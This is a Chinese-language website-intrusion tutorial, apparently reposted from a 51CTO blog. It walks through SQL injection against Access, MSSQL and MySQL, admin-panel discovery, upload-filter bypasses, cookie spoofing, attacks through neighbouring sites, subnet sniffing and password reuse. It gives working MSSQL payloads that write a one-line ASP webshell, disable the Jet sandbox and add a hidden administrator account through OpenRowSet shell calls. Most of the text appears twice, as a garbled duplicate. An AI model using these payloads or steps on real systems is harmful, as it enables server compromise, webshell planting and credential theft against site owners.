一:注入类:
access数据库
<1>
首先猜解管理员密码:
手工猜解(当然,如果你有基础,这里就很简单。如果没学过,其实只要记下一些常用的语句就可以了。)
工具猜解。我建议用zwell的穿山甲,也就是pangolin..或者是NBSI。前者猜解速度非常强悍。而猜解的准确率两者都很好。
找出后台:
用明小子,啊D,等工具都可以找的。但有时候会找不到。为什么呢?建议用多线程后台扫描工具。里面的字典你可以从明小子等那些工具里综合起来。还有一点。平时检测网站的时候遇到一些你字典里没有的后台名称。要注意积累下来。
另外种方法找后台
当然就是googlehack了。
Admin site:xxx.com
管理 site:xxx.com
Site:xxx.com inurl:login
等等。这些靠自己构造。
<2>跨库查询
使用跨库查询有两个前提:
1:使用union查询必须知道前一个select里表的字段数
2:必须知道目标数据库的所在位置,绝对路径。
具体文章可以参照这里:
http://www.4ngel.net/article/46.htm
SQL网站渗透方法
MSSQL数据库:
1:SA权限
一般说来,无论谁拿到一个SA权限的注射点。都会很开心。
<1>直接执行net user等命令。
<2>可列目录但不能执行系统命令。
可以列出目录找出网站中可以利用的地方,比如ewebeditor,或者上传地址(试试是否有上传漏洞),等等。
或者找服务器下其他网站,然后入侵之。
如果无其他漏洞可以找到,那就利用备份得到一个webshell。
<3>无cmdshell
那就恢复之。详细请在论坛或者百度搜索相关文章。
<4>如果无法恢复cmdshell
也就是利用的sp_oacreate来执行。可以通过5次shift来登陆3389
还可以利用sp_makewebtask直接在web目录里写入一句话马
http://127.0.0.1/sql.asp?id=1' ;exec%20sp_makewebtask%20'd:\www\xxx.asp','%20select%20''<%25execute(request("a"))%25>''%20';--
还可以利用沙盒模式提权
EXEC%20master.dbo.xp_regwrite%20'HKEY_LOCAL_MACHINE','SoftWare\Microsoft\Jet\4.0\Engines','SandBoxMode','REG_DWORD',0;--
Select*From OpenRowSet('Microsoft.Jet.OLEDB.4.0',';Database=c:\windows\system32\ias\ias.mdb','select shell("net user aloner$ aloner /add")');--
;Select*From OpenRowSet('Microsoft.Jet.OLEDB.4.0',';Database=c:\windows\system32\ias\ias.mdb','select shell("net localgroup administrators aloner$ /add")');--
如果上述方法仍然不行,那就猜解出后台帐户和密码,然后登陆后台。看看有没什么可以利用的。
2:db权限
Db权限可以列出网站目录,然后备份。用一句话连接得到webshell.
如果可以列目录,但无法备份,也同样可以利用找其他漏洞来入侵。毕竟整个网站都可以被你浏览了。
然后就是猜解出后台帐户和密码登陆后台了。
还有一种就是关于一篇db权限备份到启动项得到系统权限。
public权限
此权限很多人不会利用。
但是可以列出目录的。
Mysql数据库:
Root权限下可以直接利用loadfile读取网站的文件内容(网站的配置信息)
然后就是注入语句得到管理员密码,登陆后台
二:上传类
1:直接上传木马
2:修改后缀名修改。比如修改成.asa .cer等。
3:图片头欺骗
在木马代码前加上 gif89a,有时可以成功通过验证。
4:抓包nc上传
这个比较烦。这个可以大家自己从网上找一下相关的文章和教程。
5:直接(抓包)利用明小子或者其他工具上传木马
三:暴库:
详细请在论坛或者百度搜索相关文章。
现在暴库漏洞很少了。
四:cookies欺骗。
如果我们现在已经知道了XX站管理员的站号和MD5密码了 但是破解 不出来密码(MD5是加密后的一个16位的密码)我们就可以用COOKIE诈骗来实现,把自己的ID修改成管理员的,MD5密码也修改成他的,有工具可以修改 COOKIE 这样就答到了COOKIE诈骗的目的,系统以为你就是管理员了。
(这个漏洞在新云2.0里可以利用)
五:旁注
什么是旁注呢?
在我们入侵目标站点不成功的时候,我们可以通过入侵它服务器的其他网站,得到webshell,然后提权。
这点就需要你对提权有所认识的基础下了。
在上述几种方法中我把SQL注入讲的稍微详细些。因为毕竟现在SQL注入满天飞。其他几种漏洞不是太多的。但也不少。呵呵。
五:嗅探
当我们入侵目标网站无望,且旁注无望时,我们就需要入侵服务器所在的C段去得到一个服务器。
比如我们的目标是222.222.222.1。那我们就需要入侵222.222.222.2----222.222.222.255中的一台。然后去嗅探得到目标的21 80 1433 3306 3389等对应端口的相关密码。
六.社会工程学入侵。
whois查询。
得到管理员的姓名,邮箱,电话,等等之类信息
然后通过得到一些信息,可以利用。
比如我们得到xxx.com的管理员油箱是aaa@163.com
我们就可以去google搜索:aaa@163.com或者是aaa.
以此类推。
入侵一个比较容易拿下的站。然后查询数据库得到此帐户注册时的密码。
可以试下是否是油箱的密码。甚至是这个网站的后台,ftp,等的密码。社会工程学太深了。我也没办法讲很多。
但我刚说的这点已经利用很大了。主要利用的还是个人心理。一般密码设置很多都会去用同一个密码的。
总结:
access数据库
<1>
首先猜解管理员密码:
手工猜解(当然,如果你有基础,这里就很简单。如果没学过,其实只要记下一些常用的语句就可以了。)
工具猜解。我建议用zwell的穿山甲,也就是pangolin..或者是NBSI。前者猜解速度非常强悍。而猜解的准确率两者都很好。
找出后台:
用明小子,啊D,等工具都可以找的。但有时候会找不到。为什么呢?建议用多线程后台扫描工具。里面的字典你可以从明小子等那些工具里综合起来。还有一点。平时检测网站的时候遇到一些你字典里没有的后台名称。要注意积累下来。
另外种方法找后台
当然就是googlehack了。
Admin site:xxx.com
管理 site:xxx.com
Site:xxx.com inurl:login
等等。这些靠自己构造。
<2>跨库查询
使用跨库查询有两个前提:
1:使用union查询必须知道前一个select里表的字段数
2:必须知道目标数据库的所在位置,绝对路径。
具体文章可以参照这里:
http://www.4ngel.net/article/46.htm
SQL网站渗透方法
MSSQL数据库:
1:SA权限
一般说来,无论谁拿到一个SA权限的注射点。都会很开心。
<1>直接执行net user等命令。
<2>可列目录但不能执行系统命令。
可以列出目录找出网站中可以利用的地方,比如ewebeditor,或者上传地址(试试是否有上传漏洞),等等。
或者找服务器下其他网站,然后入侵之。
如果无其他漏洞可以找到,那就利用备份得到一个webshell。
<3>无cmdshell
那就恢复之。详细请在论坛或者百度搜索相关文章。
<4>如果无法恢复cmdshell
也就是利用的sp_oacreate来执行。可以通过5次shift来登陆3389
还可以利用sp_makewebtask直接在web目录里写入一句话马
http://127.0.0.1/sql.asp?id=1' ;exec%20sp_makewebtask%20'd:\www\xxx.asp','%20select%20''<%25execute(request("a"))%25>''%20';--
还可以利用沙盒模式提权
EXEC%20master.dbo.xp_regwrite%20'HKEY_LOCAL_MACHINE','SoftWare\Microsoft\Jet\4.0\Engines','SandBoxMode','REG_DWORD',0;--
Select*From OpenRowSet('Microsoft.Jet.OLEDB.4.0',';Database=c:\windows\system32\ias\ias.mdb','select shell("net user aloner$ aloner /add")');--
;Select*From OpenRowSet('Microsoft.Jet.OLEDB.4.0',';Database=c:\windows\system32\ias\ias.mdb','select shell("net localgroup administrators aloner$ /add")');--
如果上述方法仍然不行,那就猜解出后台帐户和密码,然后登陆后台。看看有没什么可以利用的。
2:db权限
Db权限可以列出网站目录,然后备份。用一句话连接得到webshell.
如果可以列目录,但无法备份,也同样可以利用找其他漏洞来入侵。毕竟整个网站都可以被你浏览了。
然后就是猜解出后台帐户和密码登陆后台了。
还有一种就是关于一篇db权限备份到启动项得到系统权限。
public权限
此权限很多人不会利用。
但是可以列出目录的。
Mysql数据库:
Root权限下可以直接利用loadfile读取网站的文件内容(网站的配置信息)
然后就是注入语句得到管理员密码,登陆后台
二:上传类
1:直接上传木马
2:修改后缀名修改。比如修改成.asa .cer等。
3:图片头欺骗
在木马代码前加上 gif89a,有时可以成功通过验证。
4:抓包nc上传
这个比较烦。这个可以大家自己从网上找一下相关的文章和教程。
5:直接(抓包)利用明小子或者其他工具上传木马
三:暴库:
详细请在论坛或者百度搜索相关文章。
现在暴库漏洞很少了。
四:cookies欺骗。
如果我们现在已经知道了XX站管理员的站号和MD5密码了 但是破解 不出来密码(MD5是加密后的一个16位的密码)我们就可以用COOKIE诈骗来实现,把自己的ID修改成管理员的,MD5密码也修改成他的,有工具可以修改 COOKIE 这样就答到了COOKIE诈骗的目的,系统以为你就是管理员了。
(这个漏洞在新云2.0里可以利用)
五:旁注
什么是旁注呢?
在我们入侵目标站点不成功的时候,我们可以通过入侵它服务器的其他网站,得到webshell,然后提权。
这点就需要你对提权有所认识的基础下了。
在上述几种方法中我把SQL注入讲的稍微详细些。因为毕竟现在SQL注入满天飞。其他几种漏洞不是太多的。但也不少。呵呵。
五:嗅探
当我们入侵目标网站无望,且旁注无望时,我们就需要入侵服务器所在的C段去得到一个服务器。
比如我们的目标是222.222.222.1。那我们就需要入侵222.222.222.2----222.222.222.255中的一台。然后去嗅探得到目标的21 80 1433 3306 3389等对应端口的相关密码。
六.社会工程学入侵。
whois查询。
得到管理员的姓名,邮箱,电话,等等之类信息
然后通过得到一些信息,可以利用。
比如我们得到xxx.com的管理员油箱是aaa@163.com
我们就可以去google搜索:aaa@163.com或者是aaa.
以此类推。
入侵一个比较容易拿下的站。然后查询数据库得到此帐户注册时的密码。
可以试下是否是油箱的密码。甚至是这个网站的后台,ftp,等的密码。社会工程学太深了。我也没办法讲很多。
但我刚说的这点已经利用很大了。主要利用的还是个人心理。一般密码设置很多都会去用同一个密码的。
总结:
渗透这东西太复杂了。主要还是靠自己的灵活运用。以及对各种入侵方法的理解。无论什么东西。都是在你不断的尝试与探索下得到的。
本文转hackfreer51CTO博客,原文链接:http://blog.51cto.com/pnig0s1992/437819,如需转载请自行联系原作者